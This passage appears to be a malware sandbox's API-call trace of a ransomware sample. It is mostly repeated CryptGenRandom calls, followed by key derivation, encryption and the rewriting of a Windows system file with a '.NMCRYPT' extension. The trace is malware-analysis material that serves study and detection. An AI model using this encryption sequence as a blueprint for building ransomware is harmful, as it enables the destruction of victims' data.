dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.875] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.875] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.875] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.875] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.875] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.875] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.875] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.875] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.875] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.875] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.875] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.875] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.875] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.875] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.875] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.875] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.875] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.875] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.875] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.875] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.875] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.875] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.875] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.875] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.875] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.875] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.875] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.875] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.875] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.875] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.875] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.875] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.875] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.875] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.875] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.875] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.875] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.875] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.876] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.876] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.876] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.876] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.876] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.876] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.876] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.876] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.876] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.876] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.876] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.876] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.876] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.876] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.876] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.876] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.876] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.876] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.876] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.876] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.876] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.876] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.876] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.876] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.876] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.876] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.876] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.876] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.876] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.876] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.876] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.876] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.876] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.876] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.876] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.876] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.876] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.876] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.876] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.876] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.876] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.876] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.876] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.876] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.876] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.876] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.876] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.876] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.876] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.876] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.876] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.876] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.877] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.877] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.877] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.877] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.877] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.877] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.877] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.877] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.877] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.877] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.877] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.877] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.877] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.877] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.877] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.877] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.877] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.877] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.877] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.877] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.877] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.877] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.877] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.877] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.877] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.877] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.877] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.877] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.877] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.877] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.877] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.877] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.877] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.877] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.877] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.877] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.877] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.877] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.877] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.877] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.877] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.877] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.877] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.877] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.877] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.877] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.877] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.877] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.877] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.877] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.877] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.877] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.878] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.878] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.878] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.878] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.878] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.878] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.878] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.878] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.878] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.878] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.878] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.878] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.878] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.878] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.878] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.878] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.878] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.878] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.878] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.878] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.878] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.878] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.878] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.878] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.878] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.878] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.878] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.878] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.878] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0156.878] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7dc8c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7dc8c*=0x100) returned 1 [0156.878] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7dc8c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7dc8c*=0x100) returned 1 [0156.879] CryptCreateHash (in: hProv=0x8e2e68, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444734 | out: phHash=0x1d444734) returned 1 [0156.879] CryptHashData (hHash=0x9ad638, pbData=0x2d7dd10, dwDataLen=0x100, dwFlags=0x0) returned 1 [0156.879] CryptDeriveKey (in: hProv=0x8e2e68, Algid=0x6610, hBaseData=0x9ad638, dwFlags=0x4, phKey=0x1d444738 | out: phKey=0x1d444738*=0x9ad2b8) returned 1 [0156.879] CryptSetKeyParam (hKey=0x9ad2b8, dwParam=0x1, pbData=0x2d7de10, dwFlags=0x0) returned 1 [0156.879] CryptSetKeyParam (hKey=0x9ad2b8, dwParam=0x4, pbData=0x2d7dcc0*=0x1, dwFlags=0x0) returned 1 [0156.879] wcslen (_String="\\\\?\\") returned 0x4 [0156.879] CryptDuplicateKey (in: hKey=0x9ad2b8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7dc94 | out: phKey=0x2d7dc94*=0x9ad2f8) returned 1 [0156.879] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0156.880] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_altgr.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0156.881] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7dc84 | out: lpFileSize=0x2d7dc84*=3524) returned 1 [0156.881] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7dc7c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7dc7c*=0x200, lpOverlapped=0x0) returned 1 [0156.881] ReadFile (in: hFile=0x1624, lpBuffer=0x607d50, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7dc80, lpOverlapped=0x0 | out: lpBuffer=0x607d50*, lpNumberOfBytesRead=0x2d7dc80*=0x100, lpOverlapped=0x0) returned 1 [0156.882] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7dc68*=0x100) returned 1 